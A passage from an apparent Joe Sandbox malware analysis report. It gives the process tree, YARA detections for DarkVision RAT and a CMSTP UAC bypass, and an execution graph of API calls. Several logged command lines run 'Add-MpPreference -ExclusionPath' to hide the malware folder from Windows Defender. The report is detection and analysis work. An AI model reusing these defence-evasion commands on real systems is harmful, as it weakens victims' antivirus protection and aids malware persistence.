                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:03:28:29
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                                                        Imagebase:0x7ff6cb6b0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:03:28:29
                                                        Start date:31/12/2024
                                                        Path:C:\ProgramData\windows\windows.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2}
                                                        Imagebase:0x7ff7edb80000
                                                        File size:4'220'416 bytes
                                                        MD5 hash:D37285BF0331C7514E5E4CEC0FBE647C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000002.2778094062.00007FF7EDBBA000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000003.1669864142.0000000004927000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000003.1669864142.0000000004927000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2778070718.00007FF7EDBB9000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000000.1613068300.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000000.1613068300.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000003.1652189758.000000000492A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000003.1652189758.000000000492A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000007.00000003.1650179614.000000000492B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000003.1650179614.000000000492B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\ProgramData\windows\windows.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\ProgramData\windows\windows.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\ProgramData\windows\windows.exe, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 74%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:03:28:33
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                                                        Imagebase:0x7ff70eb30000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:03:28:33
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:03:28:33
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                                                        Imagebase:0x7ff6cb6b0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:03:28:35
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\explorer.exe"
                                                        Imagebase:0x7ff62d7d0000
                                                        File size:5'141'208 bytes
                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:15
                                                        Start time:03:28:48
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{43FE0128-8195-4F1C-ADAF-97085D2B6441}\{323467A8-45DA-47D5-AF53-60BD8A3D7BCB}.bat" "
                                                        Imagebase:0x7ff70eb30000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:03:28:48
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:03:28:48
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start "" "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}
                                                        Imagebase:0x7ff70eb30000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:03:28:48
                                                        Start date:31/12/2024
                                                        Path:C:\ProgramData\windows\windows.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}
                                                        Imagebase:0x7ff7edb80000
                                                        File size:4'220'416 bytes
                                                        MD5 hash:D37285BF0331C7514E5E4CEC0FBE647C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000012.00000000.1801050989.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000000.1801050989.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.1829520481.00007FF7EDBB9000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000012.00000002.1829539061.00007FF7EDBBA000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FFB4B0A3605 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1651038624.00007FFB4B0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffb4b0a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                          • Instruction ID: a21230a6987450b98e40ed90dfa9b8d7540310828f7304faf5d489eb9defc2d4
                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                          • Instruction Fuzzy Hash: 1F01677111CB0C8FDB44EF0CE451AA5B7E0FB99365F10056EE58AC3661D636E882CB45

                                                          Execution Graph

                                                          Execution Coverage:9.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:11.9%
                                                          Total number of Nodes:954
                                                          Total number of Limit Nodes:23
                                                          execution_graph 4458 2d01b90 4460 2d01b95 4458->4460 4461 2d01ba3 4460->4461 4464 2d01bda 4461->4464 4470 2d01be4 4461->4470 4463 2d01cc5 SleepEx 4469 2d02025 4463->4469 4464->4463 4465 2d01c9e timeGetTime 4464->4465 4465->4463 4466 2d01cc0 4465->4466 4478 2d01cd7 4466->4478 4472 2d01bef 4470->4472 4471 2d01cc5 SleepEx 4477 2d02025 4471->4477 4472->4471 4473 2d01c9e timeGetTime 4472->4473 4473->4471 4474 2d01cc0 4473->4474 4476 2d01cd7 SleepEx 4474->4476 4476->4471 4479 2d01cde SleepEx 4478->4479 4481 2d02025 4479->4481 3419 2cfd869 3420 2cfd882 SleepEx 3419->3420 3422 2cfd8d2 3420->3422 3431 29ccb30 3432 29ccb39 WaitForSingleObject 3431->3432 3433 29ccb56 SHGetKnownFolderPath 3432->3433 3434 29cccb2 3432->3434 3435 29cccad 3433->3435 3436 29ccb75 LocalAlloc 3433->3436 3435->3432 3437 29ccb96 3436->3437 3438 29ccca2 CoTaskMemFree 3436->3438 3448 29e9e0c 3437->3448 3438->3435 3440 29ccbbd CreateFileW 3443 29ccc05 3440->3443 3441 29ccc8c CloseHandle 3442 29ccc97 LocalFree 3441->3442 3442->3438 3443->3441 3443->3442 3444 29ccc21 CloseHandle LocalFree CoTaskMemFree OpenEventW 3443->3444 3459 29d5700 3443->3459 3445 29ccc6c SetEvent CloseHandle 3444->3445 3446 29ccc82 3444->3446 3445->3446 3446->3434 3449 29e9e3e write_char 3448->3449 3450 29e9e43 3449->3450 3452 29e9e65 3449->3452 3484 29ec2d0 3450->3484 3487 29eb57c 3452->3487 3454 29e9e48 _invalid_parameter_noinfo 3454->3440 3455 29e9e9f 3455->3454 3456 29e9eab 3455->3456 3502 29eb2c4 3455->3502 3456->3454 3458 29eb2c4 write_char 3 API calls 3456->3458 3458->3454 4076 29d2830 3459->4076 3462 29d58dd 3462->3443 3463 29d5731 CreateDirectoryW 3464 29d5754 LocalAlloc 3463->3464 3467 29d5743 __free_lconv_num 3463->3467 3465 29d58ca 3464->3465 3466 29d5775 3464->3466 3465->3462 3469 29d58d2 LocalFree 3465->3469 3468 29e9e0c 5 API calls 3466->3468 3467->3464 3467->3465 3470 29d579c CreateFileW GetLastError 3468->3470 3469->3462 3471 29d57eb 3470->3471 3472 29d58b7 3471->3472 3473 29d57fd 3471->3473 4087 29cbfb0 3471->4087 3472->3465 3475 29d58bf LocalFree 3472->3475 3476 29d5871 LocalFree LocalFree 3473->3476 3475->3465 3476->3462 3478 29d5899 3482 29d58ac DeleteFileW 3478->3482 3483 29d58a1 CloseHandle 3478->3483 3479 29d5830 WriteFile 3480 29d585d CloseHandle 3479->3480 3481 29d588e LocalFree 3479->3481 3480->3476 3481->3478 3482->3472 3483->3482 3523 29ec574 3484->3523 3486 29ec2d9 3486->3454 3674 29ead7c 3487->3674 3490 29ec2d0 _errno 2 API calls 3498 29eb5f0 malloc _amsg_exit 3490->3498 3491 29eb5fc 3492 29ec2d0 _errno 2 API calls 3491->3492 3493 29eb601 _invalid_parameter_noinfo malloc 3492->3493 3493->3455 3494 29eb454 RtlAllocateHeap RtlLeaveCriticalSection RtlAllocateHeap write_char 3494->3498 3495 29f1f2c _getbuf 2 API calls 3495->3498 3496 29ede60 __free_lconv_num 2 API calls 3496->3498 3498->3491 3498->3493 3498->3494 3498->3495 3498->3496 3499 29eb48c RtlAllocateHeap RtlLeaveCriticalSection RtlAllocateHeap write_multi_char 3498->3499 3500 29eb4e0 RtlAllocateHeap RtlLeaveCriticalSection RtlAllocateHeap 3498->3500 3501 29f20d0 RtlAllocateHeap MultiByteToWideChar MultiByteToWideChar RtlAllocateHeap 3498->3501 3682 29f2250 3498->3682 3499->3498 3500->3498 3501->3498 3957 29f1ccc 3502->3957 3504 29eb2e6 3505 29eb308 3504->3505 3506 29eb2f1 3504->3506 3508 29eb30d 3505->3508 3517 29eb31a write_char 3505->3517 3507 29ec2d0 _errno 2 API calls 3506->3507 3516 29eb2f6 3507->3516 3509 29ec2d0 _errno 2 API calls 3508->3509 3509->3516 3510 29eb37f 3511 29eb38c 3510->3511 3512 29eb419 3510->3512 3513 29eb3a8 3511->3513 3519 29eb3c1 3511->3519 3514 29f1924 write_char 3 API calls 3512->3514 3970 29f1924 3513->3970 3514->3516 3516->3456 3517->3510 3517->3516 3520 29eb373 3517->3520 3961 29f1a58 3517->3961 3519->3516 3992 29f10e0 3519->3992 3520->3510 3967 29f1a04 3520->3967 3524 29ec583 __doserrno __free_lconv_num 3523->3524 3531 29ec5cc __doserrno 3524->3531 3532 29f1fac 3524->3532 3526 29ec5a7 __doserrno 3527 29ec5db 3526->3527 3528 29ec5c5 3526->3528 3526->3531 3541 29ede60 3527->3541 3536 29ec4bc 3528->3536 3531->3486 3534 29f1fd1 _getbuf 3532->3534 3535 29f2011 3534->3535 3545 29f464c 3534->3545 3535->3526 3552 29f24f4 3536->3552 3538 29ec515 _amsg_exit 3539 29f24f4 _lock 2 API calls 3538->3539 3540 29ec534 __doserrno _amsg_exit 3539->3540 3540->3531 3542 29ede65 __free_lconv_num 3541->3542 3544 29ede85 __free_lconv_num 3541->3544 3543 29ec2d0 _errno 2 API calls 3542->3543 3542->3544 3543->3544 3544->3531 3546 29f4661 3545->3546 3551 29f467e malloc 3545->3551 3547 29f466f 3546->3547 3546->3551 3549 29ec2d0 _errno RtlAllocateHeap 3547->3549 3548 29f4696 RtlAllocateHeap 3550 29f4674 3548->3550 3548->3551 3549->3550 3550->3534 3551->3548 3551->3550 3553 29f2512 3552->3553 3555 29f2523 3552->3555 3558 29f240c 3553->3558 3555->3538 3556 29f2517 3556->3555 3580 29f01c8 3556->3580 3559 29f244a 3558->3559 3560 29f2433 3558->3560 3578 29f245f _lock 3559->3578 3620 29f1f2c 3559->3620 3587 29f047c 3560->3587 3566 29f2440 3614 29efe6c 3566->3614 3567 29f2475 3570 29ec2d0 _errno 2 API calls 3567->3570 3568 29f2484 3571 29f24f4 _lock 2 API calls 3568->3571 3570->3578 3572 29f248e 3571->3572 3573 29f24c7 3572->3573 3575 29f249a _lock 3572->3575 3574 29ede60 __free_lconv_num 2 API calls 3573->3574 3574->3578 3576 29ede60 __free_lconv_num 2 API calls 3575->3576 3575->3578 3577 29f24b1 3576->3577 3579 29ec2d0 _errno 2 API calls 3577->3579 3578->3556 3579->3578 3581 29f047c _FF_MSGBANNER 2 API calls 3580->3581 3582 29f01d5 3581->3582 3583 29f021c malloc 2 API calls 3582->3583 3584 29f01dc 3583->3584 3669 29f0000 3584->3669 3586 29f01ed 3624 29f3f28 3587->3624 3589 29f048a 3590 29f0499 3589->3590 3591 29f3f28 _set_error_mode 2 API calls 3589->3591 3592 29f021c malloc 2 API calls 3590->3592 3594 29f04ba 3590->3594 3591->3590 3593 29f04b0 3592->3593 3595 29f021c malloc 2 API calls 3593->3595 3596 29f021c 3594->3596 3595->3594 3597 29f0250 malloc 3596->3597 3598 29f3f28 _set_error_mode 2 API calls 3597->3598 3603 29f03a2 _invalid_parameter_noinfo malloc 3597->3603 3599 29f0266 3598->3599 3600 29f3f28 _set_error_mode 2 API calls 3599->3600 3599->3603 3601 29f0277 3600->3601 3601->3603 3628 29f3ebc 3601->3628 3603->3566 3604 29f02b3 malloc 3604->3603 3605 29f3ebc malloc 2 API calls 3604->3605 3606 29f02f4 _invalid_parameter_noinfo malloc 3604->3606 3605->3606 3612 29f034c _invalid_parameter_noinfo 3606->3612 3635 29f3dec 3606->3635 3608 29f0377 3608->3603 3610 29f3d64 malloc 2 API calls 3608->3610 3611 29f0389 3610->3611 3611->3603 3649 29f3b5c 3611->3649 3642 29f3d64 3612->3642 3615 29efe79 malloc 3614->3615 3616 29f2523 3615->3616 3617 29f240c _lock 2 API calls 3615->3617 3616->3559 3618 29f2517 3617->3618 3618->3616 3619 29f01c8 _amsg_exit 2 API calls 3618->3619 3619->3616 3623 29f1f54 _getbuf 3620->3623 3622 29f1f8c 3622->3567 3622->3568 3623->3622 3656 29ee008 3623->3656 3625 29f3f30 3624->3625 3626 29ec2d0 _errno 2 API calls 3625->3626 3627 29f3f3a _invalid_parameter_noinfo 3625->3627 3626->3627 3627->3589 3629 29f3ecd 3628->3629 3630 29f3ed7 3628->3630 3629->3630 3633 29f3ef4 3629->3633 3631 29ec2d0 _errno 2 API calls 3630->3631 3632 29f3ee0 _invalid_parameter_noinfo 3631->3632 3632->3604 3633->3632 3634 29ec2d0 _errno 2 API calls 3633->3634 3634->3632 3638 29f3dfc 3635->3638 3636 29f3e01 3637 29ec2d0 _errno 2 API calls 3636->3637 3639 29f3e06 _invalid_parameter_noinfo 3636->3639 3637->3639 3638->3636 3638->3639 3640 29f3e3f 3638->3640 3639->3612 3640->3639 3641 29ec2d0 _errno 2 API calls 3640->3641 3641->3639 3643 29f3d75 3642->3643 3645 29f3d7f 3642->3645 3643->3645 3647 29f3db6 3643->3647 3644 29ec2d0 _errno 2 API calls 3646 29f3d88 _invalid_parameter_noinfo 3644->3646 3645->3644 3646->3608 3647->3646 3648 29ec2d0 _errno 2 API calls 3647->3648 3648->3646 3652 29ec488 3649->3652 3651 29f3b88 malloc _amsg_exit 3651->3603 3653 29ec490 _amsg_exit 3652->3653 3654 29ede60 __free_lconv_num 2 API calls 3653->3654 3655 29f23ba _amsg_exit 3653->3655 3654->3653 3655->3651 3657 29ee09c malloc 3656->3657 3666 29ee020 malloc 3656->3666 3660 29ec2d0 _errno RtlAllocateHeap 3657->3660 3658 29ee058 RtlAllocateHeap 3661 29ee091 3658->3661 3658->3666 3659 29f047c _FF_MSGBANNER RtlAllocateHeap 3659->3666 3660->3661 3661->3623 3662 29ee081 3664 29ec2d0 _errno RtlAllocateHeap 3662->3664 3663 29f021c malloc RtlAllocateHeap 3663->3666 3665 29ee086 3664->3665 3668 29ec2d0 _errno RtlAllocateHeap 3665->3668 3666->3658 3666->3659 3666->3662 3666->3663 3666->3665 3667 29efe6c malloc RtlAllocateHeap 3666->3667 3667->3666 3668->3661 3670 29f24f4 _lock 2 API calls 3669->3670 3673 29f002e _amsg_exit 3670->3673 3671 29f0116 malloc _amsg_exit 3671->3586 3672 29ec488 RtlAllocateHeap RtlAllocateHeap _amsg_exit 3672->3673 3673->3671 3673->3672 3675 29ead8e 3674->3675 3676 29eadef 3674->3676 3685 29ec5f8 3675->3685 3676->3490 3679 29eadc8 3679->3676 3702 29ef3a4 3679->3702 3683 29ead7c write_char 2 API calls 3682->3683 3684 29f2262 3683->3684 3684->3498 3686 29ec574 __doserrno 2 API calls 3685->3686 3687 29ec603 3686->3687 3688 29ead93 3687->3688 3689 29f01c8 _amsg_exit 2 API calls 3687->3689 3688->3679 3690 29efc74 3688->3690 3689->3688 3691 29ec5f8 _getptd 2 API calls 3690->3691 3693 29efc7f 3691->3693 3692 29efca8 3695 29f24f4 _lock 2 API calls 3692->3695 3693->3692 3694 29efc9a 3693->3694 3696 29ec5f8 _getptd 2 API calls 3694->3696 3697 29efcb2 3695->3697 3699 29efc9f _amsg_exit 3696->3699 3711 29efc1c 3697->3711 3700 29efce0 3699->3700 3701 29f01c8 _amsg_exit 2 API calls 3699->3701 3700->3679 3701->3700 3703 29ec5f8 _getptd 2 API calls 3702->3703 3704 29ef3b3 3703->3704 3705 29f24f4 _lock 2 API calls 3704->3705 3706 29ef3ce _amsg_exit 3704->3706 3709 29ef3e1 3705->3709 3707 29ef450 3706->3707 3708 29f01c8 _amsg_exit 2 API calls 3706->3708 3707->3676 3708->3707 3709->3706 3710 29ede60 __free_lconv_num 2 API calls 3709->3710 3710->3706 3712 29efc66 3711->3712 3713 29efc2a write_char __doserrno 3711->3713 3712->3699 3713->3712 3715 29efaa0 3713->3715 3716 29efabe 3715->3716 3717 29efb37 3715->3717 3716->3717 3724 29efafd 3716->3724 3726 29ede60 __free_lconv_num 2 API calls 3716->3726 3718 29efb8a 3717->3718 3719 29ede60 __free_lconv_num 2 API calls 3717->3719 3735 29efbb7 3718->3735 3783 29f31d8 3718->3783 3720 29efb5b 3719->3720 3722 29ede60 __free_lconv_num 2 API calls 3720->3722 3727 29efb6f 3722->3727 3723 29efb1f 3729 29ede60 __free_lconv_num 2 API calls 3723->3729 3724->3723 3734 29ede60 __free_lconv_num 2 API calls 3724->3734 3731 29efaf1 3726->3731 3733 29ede60 __free_lconv_num 2 API calls 3727->3733 3728 29efc02 3736 29efb2b 3729->3736 3730 29ede60 __free_lconv_num 2 API calls 3730->3735 3743 29f3634 3731->3743 3732 29ede60 RtlAllocateHeap RtlAllocateHeap __free_lconv_num 3732->3735 3738 29efb7e 3733->3738 3739 29efb13 3734->3739 3735->3728 3735->3732 3740 29ede60 __free_lconv_num 2 API calls 3736->3740 3741 29ede60 __free_lconv_num 2 API calls 3738->3741 3771 29f35c8 3739->3771 3740->3717 3741->3718 3744 29f3738 3743->3744 3745 29f363d 3743->3745 3744->3724 3746 29f3657 3745->3746 3748 29ede60 __free_lconv_num 2 API calls 3745->3748 3747 29f3669 3746->3747 3749 29ede60 __free_lconv_num 2 API calls 3746->3749 3750 29f367b 3747->3750 3751 29ede60 __free_lconv_num 2 API calls 3747->3751 3748->3746 3749->3747 3752 29f368d 3750->3752 3753 29ede60 __free_lconv_num 2 API calls 3750->3753 3751->3750 3754 29f369f 3752->3754 3755 29ede60 __free_lconv_num 2 API calls 3752->3755 3753->3752 3756 29f36b1 3754->3756 3758 29ede60 __free_lconv_num 2 API calls 3754->3758 3755->3754 3757 29f36c3 3756->3757 3759 29ede60 __free_lconv_num 2 API calls 3756->3759 3760 29f36d5 3757->3760 3761 29ede60 __free_lconv_num 2 API calls 3757->3761 3758->3756 3759->3757 3762 29f36e7 3760->3762 3763 29ede60 __free_lconv_num 2 API calls 3760->3763 3761->3760 3764 29f36f9 3762->3764 3765 29ede60 __free_lconv_num 2 API calls 3762->3765 3763->3762 3766 29f370e 3764->3766 3767 29ede60 __free_lconv_num 2 API calls 3764->3767 3765->3764 3768 29f3723 3766->3768 3769 29ede60 __free_lconv_num 2 API calls 3766->3769 3767->3766 3768->3744 3770 29ede60 __free_lconv_num 2 API calls 3768->3770 3769->3768 3770->3744 3772 29f35cd 3771->3772 3773 29f362e 3771->3773 3774 29f35e6 3772->3774 3775 29ede60 __free_lconv_num 2 API calls 3772->3775 3773->3723 3776 29f35f8 3774->3776 3777 29ede60 __free_lconv_num 2 API calls 3774->3777 3775->3774 3778 29f360a 3776->3778 3779 29ede60 __free_lconv_num 2 API calls 3776->3779 3777->3776 3780 29ede60 __free_lconv_num 2 API calls 3778->3780 3781 29f361c 3778->3781 3779->3778 3780->3781 3781->3773 3782 29ede60 __free_lconv_num 2 API calls 3781->3782 3782->3773 3784 29efbab 3783->3784 3785 29f31e1 3783->3785 3784->3730 3786 29ede60 __free_lconv_num 2 API calls 3785->3786 3787 29f31f2 3786->3787 3788 29ede60 __free_lconv_num 2 API calls 3787->3788 3789 29f31fb 3788->3789 3790 29ede60 __free_lconv_num 2 API calls 3789->3790 3791 29f3204 3790->3791 3792 29ede60 __free_lconv_num 2 API calls 3791->3792 3793 29f320d 3792->3793 3794 29ede60 __free_lconv_num 2 API calls 3793->3794 3795 29f3216 3794->3795 3796 29ede60 __free_lconv_num 2 API calls 3795->3796 3797 29f321f 3796->3797 3798 29ede60 __free_lconv_num 2 API calls 3797->3798 3799 29f3227 3798->3799 3800 29ede60 __free_lconv_num 2 API calls 3799->3800 3801 29f3230 3800->3801 3802 29ede60 __free_lconv_num 2 API calls 3801->3802 3803 29f3239 3802->3803 3804 29ede60 __free_lconv_num 2 API calls 3803->3804 3805 29f3242 3804->3805 3806 29ede60 __free_lconv_num 2 API calls 3805->3806 3807 29f324b 3806->3807 3808 29ede60 __free_lconv_num 2 API calls 3807->3808 3809 29f3254 3808->3809 3810 29ede60 __free_lconv_num 2 API calls 3809->3810 3811 29f325d 3810->3811 3812 29ede60 __free_lconv_num 2 API calls 3811->3812 3813 29f3266 3812->3813 3814 29ede60 __free_lconv_num 2 API calls 3813->3814 3815 29f326f 3814->3815 3816 29ede60 __free_lconv_num 2 API calls 3815->3816 3817 29f3278 3816->3817 3818 29ede60 __free_lconv_num 2 API calls 3817->3818 3819 29f3284 3818->3819 3820 29ede60 __free_lconv_num 2 API calls 3819->3820 3821 29f3290 3820->3821 3822 29ede60 __free_lconv_num 2 API calls 3821->3822 3823 29f329c 3822->3823 3824 29ede60 __free_lconv_num 2 API calls 3823->3824 3825 29f32a8 3824->3825 3826 29ede60 __free_lconv_num 2 API calls 3825->3826 3827 29f32b4 3826->3827 3828 29ede60 __free_lconv_num 2 API calls 3827->3828 3829 29f32c0 3828->3829 3830 29ede60 __free_lconv_num 2 API calls 3829->3830 3831 29f32cc 3830->3831 3832 29ede60 __free_lconv_num 2 API calls 3831->3832 3833 29f32d8 3832->3833 3834 29ede60 __free_lconv_num 2 API calls 3833->3834 3835 29f32e4 3834->3835 3836 29ede60 __free_lconv_num 2 API calls 3835->3836 3837 29f32f0 3836->3837 3838 29ede60 __free_lconv_num 2 API calls 3837->3838 3839 29f32fc 3838->3839 3840 29ede60 __free_lconv_num 2 API calls 3839->3840 3841 29f3308 3840->3841 3842 29ede60 __free_lconv_num 2 API calls 3841->3842 3843 29f3314 3842->3843 3844 29ede60 __free_lconv_num 2 API calls 3843->3844 3845 29f3320 3844->3845 3846 29ede60 __free_lconv_num 2 API calls 3845->3846 3847 29f332c 3846->3847 3848 29ede60 __free_lconv_num 2 API calls 3847->3848 3849 29f3338 3848->3849 3850 29ede60 __free_lconv_num 2 API calls 3849->3850 3851 29f3344 3850->3851 3852 29ede60 __free_lconv_num 2 API calls 3851->3852 3853 29f3350 3852->3853 3854 29ede60 __free_lconv_num 2 API calls 3853->3854 3855 29f335c 3854->3855 3856 29ede60 __free_lconv_num 2 API calls 3855->3856 3857 29f3368 3856->3857 3858 29ede60 __free_lconv_num 2 API calls 3857->3858 3859 29f3374 3858->3859 3860 29ede60 __free_lconv_num 2 API calls 3859->3860 3861 29f3380 3860->3861 3862 29ede60 __free_lconv_num 2 API calls 3861->3862 3863 29f338c 3862->3863 3864 29ede60 __free_lconv_num 2 API calls 3863->3864 3865 29f3398 3864->3865 3866 29ede60 __free_lconv_num 2 API calls 3865->3866 3867 29f33a4 3866->3867 3868 29ede60 __free_lconv_num 2 API calls 3867->3868 3869 29f33b0 3868->3869 3870 29ede60 __free_lconv_num 2 API calls 3869->3870 3871 29f33bc 3870->3871 3872 29ede60 __free_lconv_num 2 API calls 3871->3872 3873 29f33c8 3872->3873 3874 29ede60 __free_lconv_num 2 API calls 3873->3874 3875 29f33d4 3874->3875 3876 29ede60 